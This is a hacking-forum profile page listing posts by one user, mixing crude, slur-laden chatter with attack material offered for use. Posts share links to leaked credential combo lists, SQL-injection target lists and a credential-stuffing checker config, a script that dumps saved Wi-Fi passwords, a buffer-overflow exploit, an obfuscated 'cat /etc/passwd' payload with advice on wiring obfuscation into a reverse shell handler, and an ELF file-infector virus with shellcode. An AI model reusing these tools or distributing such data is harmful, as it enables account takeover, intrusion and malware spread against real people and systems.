mesvak

Members
  • Content Count

    2,691
  • Last visited

  • Days Won

    4

Everything posted by mesvak

  1. sir fuck u why u gae and posting others nudes oooof that s so milenial
  2. welp this seems like a legit shit but i like it how u play with words nibba and i like to see u in the future having cheat chat sir can u call my manager to make an appointment so we can talk and hope u enjoi ur stay here with us wlc nibba leecher
  3. ok let me explain one by one why we import subprocess becuase we needa connect to cmd and then in cmd if you type netsh wlan show profile {Profile Name} key=clear you will see the wifi password so we will use that fucking command to extract the wifi password so we use subprocess.check_output and ..... . then we will try to decode it by utf-8 sometimes its not utf-8 if we wanna ignore that type and just print it out we will use try And except index done [hide] import subprocess data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8', errors="backslashreplace").split('\n') profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i] for i in profiles: try: results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8', errors="backslashreplace").split('\n') results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b] try: print ("{:<30}| {:<}".format(i, results[0])) except IndexError: print ("{:<30}| {:<}".format(i, "")) except subprocess.CalledProcessError: print ("{:<30}| {:<}".format(i, "ENCODING ERROR")) input("") [/hide]
  4. [hide] https://www.upload.ee/files/10079188/2k_France.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  5. [hide] https://www.upload.ee/files/10079195/9K__Germany__1_.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  6. [hide] https://www.upload.ee/files/10079189/4K_USA.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  7. [hide] https://www.upload.ee/files/10079190/400k_SQLi_USA.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  8. [hide] https://www.upload.ee/files/10079191/8K.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  9. [hide] https://www.upload.ee/files/10079197/Split__1.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  10. [hide] https://www.upload.ee/files/10079192/100K.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  11. [hide] https://www.upload.ee/files/10079193/Indian_Semi_Used.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  12. [hide] https://www.upload.ee/files/10078940/Dork_Games__Priv.txt.html [/hide]
  13. NORMAL PROXIES COMBO EMAIL /PASS CAPURE ( DATE ,SUB , PLAN START , PLAN END ) [hide] https://www.upload.ee/files/10074518/ErosNow.ini__1_.sccfg.html [/hide]
  14. [hide] https://www.upload.ee/files/10070709/Socks4.txt.html [/hide]
  15. [hide] https://www.upload.ee/files/10070710/HTTP.txt.html [/hide]
  16. i never tried it with c# tbh but tried it with java like 2 years ago and about 3 months ago there was a person who created a similar shit which is this guy https://github.com/trekawek/coffee-gb/tree/master/src/main/java/eu/rekawek/coffeegb/cpu But its written in java i can translate it to c# if u didnt get it just give a quick brief shit so basically for writing an emulator you needa consider 1- cpu ( timing and .....) 2- memory and dont forget you needa write diff script for each of them seemingly in this script that tbh i m a bit confused about what u written there cuase you cannot bind them without importing them APprently this is the case you working on } public OpcodeBuilder proceedIf(String condition) { ops.add(new Op() { @Override public boolean proceed(Registers registers) { switch (condition) { case "NZ": return !registers.getFlags().isZ(); case "Z": return registers.getFlags().isZ(); case "NC": return !registers.getFlags().isC(); case "C": return registers.getFlags().isC(); } And as a reminder you needa mention the the value of bit u going to use and what is z is it below z<8 bits or ......
  17. sir im the best pleb u can find how can i help u
  18. [hide] https://www.upload.ee/files/10066419/Israeel_IP.txt.html [/hide]
  19. [hide] A script to exploit it might look like this: from subprocess import * import struct p = Popen([r'ConsoleApplication4.exe', 'f'], stdout=PIPE, stdin=PIPE, stderr=STDOUT) enter="-1\n" p.stdin.write(enter) numero=struct.pack("c=struct.pack("key=struct.pack(" payload = "A" * 16 + numero + c + key + "\n" p.stdin.write(payload) testresult = p.communicate()[0] print(testresult) https://0x00sec.s3.amazonaws.com/original/2X/2/24bcdc4d09368a7b028dcc385a606ebcb68d161b.png[/img] We see that it happens -1 as number to pass the check when it compares with sign against 0x10 and then the 16 bytes to fill the buffer, then the number to which I passed a correct value of 0x34333231 because overflodear will change it, then c which can be any value and then the key 0x45934215. [/hide]
  20. Link: https://github.com/Bashfuscator/Bashfuscator Example obfuscated payload (input is cat /etc/passwd) : ): ${@~}eval "$(pr""i''n\t${@%%G}f "\x$(""${*##x:}prin""$'\x74'f %s 'P?'|${*//_f/M:}md5\s''\um|${@,,}c""\ut -b 24-25)""${@^^}";${*~~}prin''t\f "\x$(prin"${@,,}"tf %s '~'|${*%%>}m$'\144'5s$'\165'\m|${*##hG}$'\x63'$'\x75'${@##N|}t -b 4-5)";''${*%%Z}print$'\x66' "\x$(p''r$'\x69'n""\t$'\x66' %s '2['|md${*##+}5""sum|${@##l}cu${!@}t -b 17-18${@^^})"${*^}&&p""r""$'\151'ntf "\x$($'\x70'r${@/m}int$'\x66' %s '1'|${*,}m\d5${!*}su$'\155'|${*%%E}c${*%%#}ut -b 16-17)";$'\160'''\r$'\151'\n""t""${@,}f "\x$(p\rintf %s 't9'${*//i/wm}|${*/J\)}m"${@//j/6=}"d5s''um|"${@}"''c${*#L\{}u${*//0}t -b 2-3${*})"&&${*~~}pri''nt\f "\x$(p\ri$'\x6e't\f %s 'g}'${*//\!J}|$@m''${*~}d5su${@/99}m|${*/7}"${@,}"c''ut -b 2-3)""${@//#p/B\(}";p""${*#=}r${*/\{/]}in$'\x74'f "\x$(\p"${@,,}"rin$'\x74'\f %s 'sW'|md\5''su""m"${@//rR/#i}"|cut -b 7-8)"&&""\p$'\x72'$'\x69'nt\f "\x$(p""${*//3U}r${*,}in${*/me}t''f %s '.'${@%g}|''"${@~}"md\5$'\x73'${*%#X}um|"${@,}"""$'\x63'\u$'\x74' -b 13-14)"${*~}&&${@~~}$'\x70'r$'\x69'ntf "\x$(\printf %s 'g'${*#Jh}|md$'\65'""sum|""c\u\t -b 2-3${@^^})"&&${*~~}pri""\ntf "\x$(p''r''\i$'\156'''t''f %s 'fC'${*//F-/^}|${@,}m$'\x64'5sum|''cut -b 19-20)"${*,}&&"${@//9/*#}"pr''i\n"""${@~}"tf "\x$(${@,}p\r""$'\x69'$'\x6e'$*t\f %s 'ys'|$'\155'""d5sum$*|cu\t -b 12-13"${@^^}")"${@//yZ}&&p""$'\162'in$'\164'f "\x$(printf %s '('|${@}""md5''$'\163'''$'\x75'm|c$'\165'\t -b 7-8${*//\(P/k})"&&${*/rd}$'\160'${*//Q5/u}r"${@//3}"i${*~}n""tf "\x$(p\r${*//W}in$'\x74'f %s '{J'${*~}|md${@%%NA}5\sum|c$'\165'$'\x74' -b 27-28"${@^^}")"${*^^};printf "\x$(""p""rintf %s ';e'|m${@/4}d5sum|${!@}c''$'\x75't -b 3-4"${@,}")"&&$*${*^^}prin$'\x74'f "\x$(""p""\r"$@"i""\n''tf %s 'q;'"${@~~}"|${*,,}m''d5sum"${@~~}"|"${@,,}"cu''\t -b 14-15)")" Bashfuscator makes obfuscating Bash one-liners and scripts incredibly easy. It can be used from the command line, or as a Python library. You can manually specify commands or scripts for Bashfuscator to obfuscate, feed it stdin to obfuscate and pass output though a pipeline, or use it an existing Python 3 project. A great example of Bashfuscator’s use as a library is integration with a reverse or bind shell handler. In only 3 extra lines of code, every command you send through your reverse or bind shell will now be obfuscated transparently. Example: from bashfuscator.core.obfuscation_handler import ObfuscationHandler # socket code here obHandler = ObfuscationHandler() inputCmd = input("$ ") obfCommand = obHandler.genObfuscationLayer(inputCmd) # send command to reverse/bind shell EXAMPLE FOR PAYLOAD : https://asciinema.org/a/6LmMVyoxUbDIwvl5yzynVbrS1 Y OU CAN USE BASE 64 BTW BUT ITS EZ TO BE DECRYPTED
  21. this is so simple just you needa know knowing stuff in C/C++ knowing stuff in Intel x86 assembly Knowledge of the WinAPI and its documentation Knowledge of the PE file structure Knowledge of Dynamic Linked Libraries [hide] poc .c written in c++ https://pastr.io/view/sbYDYI and asmbelly code section .text global _start _start: sub r12, 0x4f20 push rax push rdi push rsi push rdx mov rax,1 ; [1] - sys_write mov rdi,1 ; 0 = stdin / 1 = stdout / 2 = stderr lea rsi,[rel msg] ; pointer(mem address) to msg (*char[]) mov rdx, msg_end - msg ; msg size syscall ; calls the function stored in rax pop rdx pop rsi pop rdi pop rax jmp r12 align 8 msg db 'Infected file Test',0x0a,0 msg_end db 0x0 and usage written by shitty hands $ cp / bin / uname evil_uname $ ./niga evil_uname ELF virus example Running in offset mode + Mapped file (35032 bytes) at 0x7fff7ae5a540 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) offset == 0x4f20 $ #change offset on shellcoda.asm $ nasm -f elf64 shellcode.asm $ ./niga evil_uname shellcode.o ELF virus example + Mapped file (35032 bytes) at 0x7ffc51d5d920 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) + Processing victim -> Base Address: 0x (nil) + Mapped file (704 bytes) in 0x7ffc51d5d928 + Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section + Processing payload -> sname: '' + Processing payload -> sname: '.text' has entered the returning if shdr-> sh_name: 1 shdr-> sh_type: 1 shdr-> sh_addr: 0 + Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes) $ ./evil_uname Infected file Test me no gae u are all retarded plebs Xd Linux [/hide]
  22. WELP WHAT IT ESSENTIALLY DO IS GET IPS WHICH ARE FAILED TO CONNECT TO UR VPS anD USE THAT IP AGAINST THEM LETS SEE THE SCRIPT IF U HAVE TROUBLE UNDERSTANDING IT TELL ME I WILL MAKE A GUIDE FOR IT [hide] #!/usr/bin/python3.4 #BY MESVAK import re import urllib.request import json log_path = "/var/log/auth.log" hosts = [] key = "{YOUR_API_KEY}" #GET FAILED PASSWORD ATTEMPT def get_host(test): for line in text.split('\n'): if line.find("Failed password for invalid ") != -1: if get_ip(line) not in hosts: hosts.append(get_ip(line)) return hosts #GET USERNAME def get_username(line): username_word = line.split("Failed password for invalid user ") username = (username_word[1]).split(" ") return username[0] #LOCATE IP WITH GEOIP def geoip(host): response = urllib.request.urlopen("http://freegeoip.net/json/"+host) geoip = response.read().decode("utf-8") geoip = json.loads(geoip) print("\n[+] Tracking ip {}".format(geoip['ip'])) print("-------------------------------") print('\tCountry : {}\n\ttimezone : {}\n\tlatitude : {}\n\tlongitude : {}'.format(geoip['country_name'],geoip['time_zone'],geoip['latitude'],geoip['longitude'])) def passive_recon(host,key): url = "https://api.shodan.io/shodan/host/{}?key={}&minify=true".format(host,key) try: response = urllib.request.urlopen(url) result = response.read().decode('utf-8') result = json.loads(result) print("[+] Passive Recon using shodan.io") print("-------------------------------") print("\tPort : {}\n\tOrganisation {}".format(result['ports'],result['org'])) for x in range(len(result['ports'])): print("Banner {}".format(result['data'][x]['data'])) except: print("[+] Passive Recon using shodan.io") print("-------------------------------") print("\tCan't retrieve information") pass if __name__ == "__main__": with open(log_path, 'rt') as log: text = log.read() get_host(text) for host in hosts: geoip(host) passive_recon(host,key) [/hide]